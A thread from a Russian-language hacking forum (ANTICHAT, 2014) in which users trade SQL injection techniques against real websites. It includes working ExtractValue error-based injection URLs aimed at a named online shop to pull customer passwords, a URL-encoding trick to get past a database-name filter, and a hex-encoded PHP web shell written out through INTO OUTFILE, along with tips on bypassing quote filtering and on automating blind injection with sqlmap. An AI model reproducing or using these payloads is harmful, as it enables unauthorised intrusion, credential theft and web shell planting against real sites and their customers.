ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.11.2014, 15:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Есть Error based Injection.
Нужные данные находятся в соседней бд, при запросе "select pass from users" все выводит норм, при запросе "select table_name from+information_schema.tables" - все норм
Но когда пытаешься вытащить данные(таблицы и колонки вытягивает норм) с соседней бд срабатывает защита: "select pass2 from нужнаяБД.users". Примечательно, но и когда выполняешь запрос типа "select pass from БДвкоторойсижу.users" так же срабатывает защита. Подумал бы что дело в "." между бд и ьаблицей, но с information_schema вытягивает ведь. Застопорился, что можно попробовать?
норм
Код HTML:
HTML:
_http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+customers+limit+0,1))))=1
ошибка
Код HTML:
HTML:
http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+formaggiodb_osc.customers+limit+0,1))))=1
|
|
|
|

07.11.2014, 01:36
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
действительно фильтр на имя бд. помогло урл кодирование:
Код:
Code:
http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+forma%67%67iodb_osc.customers+limit+0,1))))=1
где %6767 = gg, то есть имя бд formaggiodb_osc
|
|
|

07.11.2014, 17:47
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме: 1034
Репутация:
0
|
|
Как залить шелл при sql-иъекции. Права file_priv есть. Могу читать файлы.
делаю 1+union+select+0,1,0x3C3F7068702073797374656D28245 F4745545B63293B203F3E+INTO+OUTFILE+'/tmp/1.txt' --
Файл не заливается.
По ходу дела фильтрация на кавычки. Как обойти и залить шелл?
|
|
|

07.11.2014, 17:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Сообщение от Sanic1977
Sanic1977 said:
Как залить шелл при sql-иъекции. Права file_priv есть. Могу читать файлы.
делаю 1+union+select+0,1,0x3C3F7068702073797374656D28245 F4745545B63293B203F3E+INTO+OUTFILE+'/tmp/1.txt' --
Файл не заливается.
По ходу дела фильтрация на кавычки. Как обойти и залить шелл?
/showpost.php?p=663815&postcount=39
/threadnav34338-1-10.html
соответственно, mg=on и mq=off
|
|
|
|

08.11.2014, 18:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Чем можно вытянуть данные через Blind SQL inj в post запросе, на https протоколе?
|
|
|
|

08.11.2014, 18:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 15642
Репутация:
6
|
|
Сообщение от Br@!ns
Br@!ns said:
Чем можно вытянуть данные через Blind SQL inj в post запросе, на https протоколе?
php+curl
|
|
|
|

08.11.2014, 18:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Сообщение от UXOR
UXOR said:
php+curl
хотелось бы готовое решение, есть такие скрипты?
|
|
|
|

09.11.2014, 00:00
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
вряд ли будет готовое решение: случай индивидуальный, плюс, такое пишется довольно быстро можешь отписать мне в жабу, разберемся, либо посмотри сам, там не особо сложный скрипт выйдет.
|
|
|

09.11.2014, 00:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 343026
Репутация:
391
|
|
Сообщение от Br@!ns
Br@!ns said:
хотелось бы готовое решение, есть такие скрипты?
эм, а с какого момента у нас SQLMAP из моды вышел? там вроде все есть -r путь до текстовика с POStом
|
|
|
|

09.11.2014, 00:23
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от Br@!ns
Br@!ns said:
хотелось бы готовое решение, есть такие скрипты?
Вот как пример скрипта:
/showpost.php?p=3739236&postcount=6
тебе только остается написать цикл под свой случай!
Сообщение от -=Cerberus=-
-=Cerberus=- said:
эм, а с какого момента у нас SQLMAP из моды вышел? там вроде все есть -r путь до текстовика с POStом
Бывает попадаются такие уязвимости, что не один софт не возьмет из широко используемых в паблике, приходится писать самим скрипты для автоматизации.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|